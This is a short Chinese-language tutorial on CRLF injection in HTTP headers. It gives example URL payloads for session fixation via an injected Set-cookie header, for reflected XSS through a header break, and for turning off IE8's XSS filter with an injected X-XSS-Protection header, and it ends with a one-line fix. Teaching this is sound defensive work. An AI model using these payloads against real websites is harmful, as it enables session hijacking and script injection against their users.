CRLF是“回车+换行”（\r\n）的简称，其十六进制编码分别为0x0d和0x0a。在HTTP协议中，HTTP header与HTTP Body是用两个CRLF分隔的，浏览器就是根据这两个CRLF来取出HTTP内容并显示出来。所以，一旦我们能够控制HTTP消息头中的字符，注入一些恶意的换行，这样我们就能注入一些会话Cookie或者HTML代码。CRLF漏洞常出现在Location与Set-cookie消息头中。

1.通过CRLF注入构造会话固定漏洞

请求参数：`http://www.sina.com%0aSet-cookie:sessionid%3Dwoyun

服务器返回：

HTTP/1.1 200 OK

Location:http://www.sina.com

Set-cookie:sessionid=woyun 

2.通过CRLF注入消息头引发XSS漏洞

在请求参数中插入CRLF字符：?email=a%0d%0a%0d%0a<script>alert(/xss/);</script>

服务器返回：

HTTP/1.1 200 OK

Set-Cookie：de=a

<script>alert(/xss/);</script> 

原理：服务器端没有过滤\r\n，而又把用户输入的数据放在HTTP头中，从而导致安全隐患。

3.浏览器的Filter是浏览器应对一些反射型XSS做的保护策略，当url中包含XSS相关特征的时候就会过滤掉不显示在页面中。

通过在数据包中http头中注入X-XSS-Protection: 0，关闭IE8的XSS Filter功能。

?url=%0aX-XSS-Protection:%200%0d%0a%0d%0a<img%20src=1%20onerror=alert(/xss/)> 

对抗CRLF只需过滤掉"\r","\n"之类的换行符即可